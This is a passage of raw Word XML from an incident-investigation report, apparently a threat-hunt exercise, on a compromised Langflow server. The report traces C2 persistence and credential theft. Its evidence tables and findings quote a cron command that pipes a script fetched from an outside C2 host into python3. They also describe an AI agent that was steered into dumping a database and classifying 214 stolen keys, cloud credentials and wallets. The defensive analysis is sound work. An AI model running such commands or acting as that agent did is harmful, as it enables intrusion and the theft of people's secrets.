                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1556EDD9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F9F8270" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxSystem_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4ABAA8F4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(langflow) CMD (curl -s http://45.131.66.106:4444/b | python3 -) — every 1 minute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="45FB0818" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="27C9B10A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="4DDBEF00" wp14:textId="209BCA60">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After finding the initial access, I needed to find out if the attacker was establishing any other outbound connections to keep a consistent connection with the server. To find this out, I ran a KQL script that searched for the targeted device ff-lf-01, and searched for any destination IP address that are not starting with 10.4.0.*, since that's who it should be connecting with internally. From there I can see normal web traffic from port 8080, and then suspicious connection from 45.131.66.106 using port 4444, which is a common Metasploit port for a reverse shell. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="7C105744" wp14:anchorId="0474F7E6">
            <wp:extent cx="5943600" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17922065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2206533" name="Picture 1792206533"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1159717384">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3171825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="36BC92B5" w:rsidP="40786FAC" w:rsidRDefault="36BC92B5" w14:paraId="3FC32ECF" w14:textId="6FB16B10">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="off" w:after="40" w:afterAutospacing="off" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I also needed to find out if there are any persistence mechanisms that were set up by the attacker. For this, I went to check the LinuxSystem_CL, which logs scheduled system events and cron activity. I specifically queried for cron jobs on all the devices, and I can see that curl commands are being run via the “(langflow) CMD (curl –s http://45.131.66.106:4444/b | python3 -)” This shows that the langflow account is running a scheduled task, which is reaching out to the C2 server silently and pulling down a script to Python, and execute it into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5124318F" w:rsidP="40786FAC" w:rsidRDefault="5124318F" w14:paraId="7A341ABC" w14:textId="18456045">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="5B34537B" wp14:anchorId="3284D799">
            <wp:extent cx="5943600" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100635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635930" name="Picture 100635930"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId301027395">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3461D779" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="166E9860" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="740AAC2A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1003 — OS Credential Dumping  |  T1528 — Steal Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3CF2D8B6" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1D84A37B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="77B20C82" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="04874E2B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="241774F2" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="18971E40" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="632615B5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="66B98ECF" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="479399EF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:25:04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C088D07" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="134D0DD1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60FE8CC0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tool: pg_dump langflow — result: dump complete, 214 secrets extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6C7671E7" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58500C5E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:25:13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="331F5D32" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CA5E671" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="67ECD9CF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tool: classify secrets — result: openai, anthropic, deepseek, gemini, alibaba, aliyun, tencent, huawei, mysql, wallets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0FB78278" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3CBED9A4" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="714AC920" w:rsidP="40786FAC" w:rsidRDefault="714AC920" w14:paraId="3BE4775D" w14:textId="6B8227C5">
      <w:pPr>
        <w:spacing w:before="160" w:after="40" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once I have located the C2 persistence, I have to find signs of credential Access via any credential-dumping source. I know this attack focuses on using the AI agent to assist in exploiting the server, so I checked the LLMAgentLogs for any suspicious model responses that could indicate the AI was compromised. After querying the SessionID that was collected earlier, I was able to find model responses from the AI that stated “Dumping the database will yield LLM provider keys and cloud credentials worth more than this host”, which shows that the agent knew where to go prior to the attack. After that, I can see logs saying “dump complete, 214 secrets extracted”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="40786FAC" w:rsidP="40786FAC" w:rsidRDefault="40786FAC" w14:paraId="1C1281B5" w14:textId="216D74FA">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="70C3D631" w:rsidP="40786FAC" w:rsidRDefault="70C3D631" w14:paraId="3D205783" w14:textId="0708E0C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="0F55DA34" wp14:anchorId="57197F87">
            <wp:extent cx="5943600" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="831568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1568018" name="Picture 831568018"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId51187214">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="675F374A" w:rsidP="40786FAC" w:rsidRDefault="675F374A" w14:paraId="5BA536F6" w14:textId="45E27F1B">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After stealing the credentials, the agent then ran a classification pass on the 214 secrets, and then sorted them into 10 provider families, including</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. LLM Providers: OpenAI, Anthropic, DeepSeek, Gemini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B700AF5" w:rsidP="40786FAC" w:rsidRDefault="7B700AF5" w14:paraId="74108C42" w14:textId="78E7D164">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Cloud Providers: Alibaba, Aliyun, Tencent, Huawei</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B700AF5" w:rsidP="40786FAC" w:rsidRDefault="7B700AF5" w14:paraId="602440CA" w14:textId="14CCCE91">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Database logins: MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B700AF5" w:rsidP="40786FAC" w:rsidRDefault="7B700AF5" w14:paraId="5AF5044C" w14:textId="1079ACED">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Crypto Wallets</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:br/>
        <w:drawing>
          <wp:inline wp14:editId="6895DCEC" wp14:anchorId="48C213CD">
            <wp:extent cx="4868636" cy="2059807"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="744287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4287007" name="Picture 744287007"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId520329635">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="4868636" cy="2059807"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5997CC1D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="110FFD37" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="57A51DAB" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Discovery</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A395E6F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1046 — Network Service Discovery  |  T1083 — File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B699379" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="549F7BC3" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="51A1110B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4FBCEA0A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
